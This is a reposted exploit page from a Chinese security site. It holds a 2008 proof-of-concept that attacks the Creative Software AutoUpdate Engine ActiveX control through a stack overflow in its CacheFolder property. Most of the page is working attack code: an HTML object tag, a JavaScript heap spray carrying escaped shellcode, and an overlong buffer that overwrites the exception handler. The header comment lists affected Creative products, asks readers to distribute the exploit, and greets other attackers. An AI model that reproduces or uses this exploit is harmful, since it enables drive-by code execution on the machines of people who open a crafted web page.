首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Creative Software AutoUpdate Engine ActiveX Stack Overflow Exploit 来源：BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M 作者：BitKrush 发布时间：2008-05-28   <html> <!-- !!!NOT PRIVATE PLEASE DISTRIBUTE!!! Zer0Day Creative Software AutoUpdate Engine ActiveX Stack-Overflow (CacheFolder) Exploit by BitKrush <BitKrush +A.T.+ G.M.A.I.L.D.0.T.C.0.M.> +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ CacheFolder property is vulnerable to stack-based buffer overflow after 260 bytes, @ 512 bytes overwrites SEH and allows code execution reliably. Original Advisory @ http://www.kb.cert.org/vuls/id/501843 and Vulnerability Discovered by Greg Linares of eEye Digital Security ActiveX Download @ http://www.creative.com/su/Product.asp MAXIMUM RESPECT TO RGOD (RIP) - A TRUE INSPIRATION Greetz to KCOPE, ELAZAR, H07, MATTEO, SHINNAI, AURIEMMA and to all the 2008 .CN/.RU/.JP/.* SQL INJECTORS - HAVE FUN WITH THIS YOU BASTARDS! +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Tested On Windows XP SP3 with all patches (like that matters) Products Affected: the below Creative Labs Software and Hardware depends on this ActiveX for updates and comes shipped with it or is supported by the control: Sound cards Audigy Audigy 2 Audigy 2 LS Audigy 2 NX Audigy 2 Platinum Audigy 2 Platinum eX Audigy 2 Value Audigy 2 ZS Audigy 2 ZS Gamer Audigy 2 ZS Notebook Audigy 2 ZS Platinum Audigy 2 ZS Platinum Pro Audigy 2 ZS Video Editor Audigy 4 Pro Audigy Gamer Audigy LS Audigy MP3+ Audigy Platinum Audigy Platinum eX Live! 24-bit Live! 24-bit External Live! 5.1 Live! 5.1 Digital (Dell) Live! ADVANCED MB MP3 + Sound Blaster Audigy 2 ZS Digital Audio Sound Blaster Audigy ADVANCED MB Sound Blaster X-Fi Fatal1ty Wireless Music X-Fi Elite Pro X-Fi Platinum X-Fi XtremeMusic USB Sound Blaster Audigy 2 NX MP3 + Portable Audio MuVo MuVo NX MuVo Slim MuVo TX MuVo TX FM MuVo² X-Trainer MuVo² MuVo² FM NOMAD II 32MB NOMAD II MG NOMAD IIc NOMAD Jukebox 3 NOMAD Jukebox ZEN Rhomba Portable Media Players ZEN Portable Media Center ZEN Vision 30GB MP3 Players MuVo MuVo 2.0 / MuVo Mix MuVo Micro MuVo NX MuVo Slim MuVo Sport C100 MuVo TX MuVo TX FM MuVo V200 MuVo² X-Trainer MuVo² MuVo² FM NOMAD II 32MB NOMAD II MG NOMAD II MG Limited Edition NOMAD IIc NOMAD JukeBox NOMAD Jukebox 10GB NOMAD Jukebox 2 NOMAD Jukebox 3 NOMAD Jukebox C NOMAD Jukebox ZEN NOMAD Jukebox ZEN NX NOMAD Jukebox ZEN USB 2.0 Rhomba ZEN 20GB ZEN Micro ZEN Nano 512MB ZEN Nano Plus ZEN Neeon 5GB/6GB ZEN Portable Media Center ZEN Sleek ZEN Touch ZEN Vision 30GB ZEN Xtra Web Cameras Creative PC-CAM 900 Creative WebCam Vista Game Star Live! Ultra for Notebooks PC-CAM 880 WebCam Instant WebCam Instant WebCam Live! WebCam Live! Pro WebCam Live! Ultra WebCam Notebook WebCam NX WebCam NX Pro WebCam NX Ultra WebCam Vista Video Audigy 2 ZS Video Editor Wireless Wireless Music Notebook Products Audigy 2 NX Audigy 2 ZS Notebook Live! 24-bit External Live! Ultra for Notebooks MP3 + WebCam Notebook Software Game Star http://us.creative.com/support/downloads/popup_supportproducts.asp Google: http://www.google.com/search?q=0A5FD7C5-A45C-49FC-ADB5-9952547D5715&btnG=Search +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ActiveX CLSID = 0A5FD7C5-A45C-49FC-ADB5-9952547D5715 KILL BIT THIS ^^ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ --> <object classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715' id='obj1'></object> <script language='javascript'> var sc01 = unescape("%u9090%u9090"+ //Windows Execute Command (calc) "%ue8fcD%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+ "%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+ "%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+ "%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040"+ "%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0"+ "%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%uf068%u048a"+ "%u685f%ufe98%u0e8a%uff57%u63e7%u6c61c"); var mainblk = unescape("%u0c0c%u0c0c"); var hdr = 20; var slck = hdr + sc01.length; while (mainblk.length < slck) mainblk += mainblk; var fillblk = mainblk.substring(0,slck); var blk = mainblk.substring(0,mainblk.length - slck); while (blk.length + slck < 0x40000) blk = blk + blk + fillblk; var memory = new Array(); for (i = 0; i < 400; i++){ memory[i] = blk + sc01 } var buf = ''; while (buf.length < 512) buf = buf + unescape("%09"); // TAB - 0x09 works best here. obj1.cachefolder = buf; </script> </html>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PHP 5.2.6 sleep() Local Memory ·CA Internet Security Suite 200 ·RevokeBB 1.0 RC11 (search) Rem ·VMware Server Console ActiveX ·SyntaxCMS <= 1.3 (fckeditor) ·RoomPHPlanning 1.5 Arbitrary A ·CMS from Scratch <= 1.1.3 (fck ·VLC 0.8.6d SSA Parsing Double ·Mambo Component mambads <= 1. ·ASUS DPC Proxy 2.0.0.16/19 Rem ·Now SMS/MMS Gateway 5.5 Remote ·PHP Booking Calendar 10 d (fck   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved